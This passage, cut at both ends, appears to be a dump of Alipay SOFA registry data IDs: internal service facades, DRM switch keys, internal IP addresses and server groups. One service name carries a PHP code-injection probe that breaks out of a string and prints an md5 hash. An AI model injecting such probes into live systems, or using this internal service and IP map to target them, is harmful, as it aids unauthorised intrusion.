FAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcredittrans@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databus.common.manage.facade.RouteConfigCheck:1.0:default@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchiswisdom.eventbus.api.WisdomEventSimulatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.po.AssetPoReRateOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.25.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","null.serverCallBack:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.label.editor.isRiskTestQueryOldProtocol,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebillcenter.common.service.facade.EbillJFMngCardFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.OrdermngDegradeDRM.isPrintSubProcessLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rcreportcenter.common.facade.service.CallRdcApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngEventListener:1.0:bkPromoGuardOpsChngEventListener@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.mng.ProductThresholdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.surlPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alideviceinfo.common.service.facade.iot.device.IotDeviceCenterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbiotcenter.common.service.facade.bg.TestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tair.AuthTokenFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openmq.common.service.facade.MessageManageFacade:1.0:openmq@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:dcprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdProfileQueryMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.instrument:name=com.alipay.common.webx.session.drm.SessionLogDrm.sessionDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.vehownerprod.parkingfacade.parkingsense.ParkingCustomerServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.94.199#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-wealthmanortwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_MYCHAIN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.koubei.kbdecisioncenter.common.service.facade.goal.GoalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcinstoperation.common.service.facade.api.financechannel.FinanceChannelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.192.125#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpwm.facade.sceneinvest.starwish.api.oneclick.StarWishAndContractOrderFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.category.QualicationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.fc.budgetcore.common.service.facade.api.BudgetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.167.220.246#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publiccore.common.service.facade.log.PublicappModifyLogFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.ukey.facade.UkeyEnterpriseManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.unifygw.facade.service.UnifygwFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:securitycap@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.210.210#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mcomment.common.service.facade.comment.CollectQueryCzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_MOBILEAPPSETCTU#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.spcenter.facade.activity.GroupChatActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprocess.sip.action.Action:1.0:merchantPunishAction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEndWith,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pcardsales:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcache:name=com.alipay.zcache.tbase.finfocoreCzoneTairCache_dest.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.224.185#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fincompose.common.service.facade.ComposeCancelService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.ssrfPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.agdscc.common.service.facade.service.credit.AgdsccPCCreditInstallmentOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditprod.service.PcreditAuthRefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csassistant.service.facade.api.AssistantOutcallRuleStrategyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.lot.IotFeedBackInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antscheduler.facade.IGrayZoneForwardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finsign.common.service.facade.base.service.FinsignBaseService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_SECURITY_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cif.facade.CustomerRoleInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:vehownerprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\";print(md5(TST_test));$a=\"@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sdadevicemonitor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfin.arc.online.decision.script.service.FinDecisionScriptScheduleService:1.0:MppFinDecisionScriptScheduleService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acordercore.common.service.facade.admin.PreChargeAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:bkpromocore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdSafaScoreQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mockapp:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cmsmng:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appstore.common.service.facade.admin.AdminUserOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.asset.VcpAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emcooperate.common.service.facade.JbAnygateRuleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_HLD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.fcrcportal.rcportalDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.eindustrycenter.common.service.facade.EindustryApplyFlowQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finloancenter.common.service.facade.FinancingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uioservice.common.service.facade.api.HbaseStorageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.client.EinvMerchantInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.84.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchportalcore.common.service.thunderbird.facade.mine.MerchantCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.selection.SelectionMngConfigNgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_CFIN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.24.107#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finassetpreference.api.facade.LevelMappingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.operation.OperationSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ifpdop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antdsr.common.service.facade.hbasedata.HbaseDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.InstitutionDrmResource.lendRouterOrgWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minicenter.common.service.facade.api.profile.MiniAppProfileQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.207.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.insusercenter.facade.asset.api.InsGroupMemberFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:amldata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcsmart.biz.service.RcSmartConstantService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.auth.CrmHomeAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.iot.tangula.facade.location.LocationService:1.0:tangula@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.yqdataservice.common.service.facade.spider.YqPropagationUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finassistantservice.common.service.facade.userevent.api.AssistantTradeTraceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.facade.SyncPlatformDataFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","antinvoice@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finmng.service.facade.ctrl.FinDataOperatService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.187#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.lego.common.facade.LegoFactoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@changeiteration#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.etetestcore.service.api.stdtrustee.BailAuthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainassetreg.facade.api.query.DcrgAssetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.bizide.common.service.facade.api.BizIterationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csportal.service.facade.api.HfTaskUpdateForMarkService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityidentify.service.ackcode.AckCodeValidateService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.core.AutoCoreQuoteFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:finasmcore_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchaincustomer.facade.tr.account.AccountService:1.0:accountServiceTr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.135#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:findatacanal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.alipayrelation.AlipayRelationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.signprotocol.KbMerchantCreateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkinstportal.common.service.facade.person.api.UserPerformanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:riskperceptcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.chips.api.ChiptransManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.developer.DeveloperActivityApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insdataprod:name=com.alipay.dwebupload.client.drm.DomainConfig.aftsApiVIP,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cifglobal:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.95.143#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.imerchprod.module.merchant.facade.api.report.MerchantReportQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.faasset.api.asset.FaAssetTransConfirmFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.habaseline.common.facade.service.metadata.NodeQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.149#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.75.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_S_CLEARING#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dsoc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundcore.msgnotify.service.facade.FinfundTradeGotoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.122.144#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mcenter.biz.event.service.BufferStorageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_fcintclcn_acrtrans#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.etetestcore.service.api.checker.YebCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.203.200#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zcache:name=com.alipay.zdal.ldc.tair.zdatabusTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradeguard.core.service.repository.WithdrawOrderRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promohelix.common.service.facade.api.sci.SciTaskConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_O_ICTU#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:promodmp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmeta.facade.metric.MetricAssertFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.playbackmng.zplayback.record.service.RecordTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanMnotifySwitherDrm.closeOrgAppIdList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.changerequirement.facade.api.ChangeIterationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloandecision.common.service.facade.service.MiniLoanDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opscloudcore.common.service.facade.execute.ExecutionControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.167.123.96#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finaggexpcore.common.service.facade.userassetcvr.UserAssetConvertFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.RouteRuleQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fininfo.common.service.facade.mng.serial.InfoSerialService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.faasset.api.net.FaNetAssetTransCancelFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfas.facade.api.UnifiedMsgFreezeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.security.sandbox.runtime.facade.service.SecuritySandboxExperimentDataFacade:1.0:unique-6271@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.SysConfigParamDrmResource.gvaSwitchConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbadvert.biz.delivery.rpc.DiscountCdpQueryRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.eco.bpaas.ecogw.facade.EcoGwApiInvokeFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.bizrecon.QueryClearBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.80.148#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.dwsap.common.service.facade.dsdc.SyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.apshopcenter.ApscShopService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.identity.CustomerServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.integration.chngservice.proto.OpsChangeService:1.0:ocp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@recruitcore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.pcreditprod.service.PcreditAuthDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mydds.common.service.facade.api.DataDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:findataprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.classification.ClassificationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.QcAssistantsFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivecenter.common.service.facade.api.ClcConversationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.amcs.AppManagementService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundWebsiteCustomerQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.conf.NotifyTopicMessageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditamount.service.PcreditAmountFreezeXtsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MOBILELBS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:promobench_ruleProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautoagent.common.telworkbench.AutoInsEmployeeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:sffgroup-minidevservice#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.accountprod.biz.rpc.thirdparty.NegativeScreenCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.confmng.ChargeInstGeographyMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.spi.SpiQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cpcenter.common.service.api.ServiceEventAtHandleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.dwebupload.client.drm.DomainConfig.aftsDwVIP,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openeco.facade.stresstest.StresstestTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.biz.news.shared.datasync.IMigraterV3:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.astaralarm.common.service.facade.DataSourceConfigManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcreditsceneprod.charityDonateTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0:finloancenterAuditTaskProcessCallbackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.235.227#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fincommontaskhub.service.facade.service.spi.FinalizeService:1.0:finvirtualta@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.36.14.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.iris.facade.IrisLogModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.uioservice.common.service.facade.api.MessagesFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ebillcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcommonweal.common.service.facade.project.back.AcwProjectBackCloneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.achelmetcore.common.service.facade.BsbSecurityPolicyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelcenter.common.service.facade.query.PlainRecordQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iWFBizProdCommonCacheTBaseCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditbill.facade.adjust.PcreditAdjustRepayDateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_DWALM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.imnotify.common.service.facade.NotifyConfigureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_benefitDefinitionOnlineSuccessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmdatafront.common.service.facade.FeedbackDataQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.masterdata.common.service.client.WorkDateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_TRANSFER_BILL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:traffic_operating_strategy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.UserRouteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.203#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.autoinsprod.common.insure.v2.AutoPackageFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.112.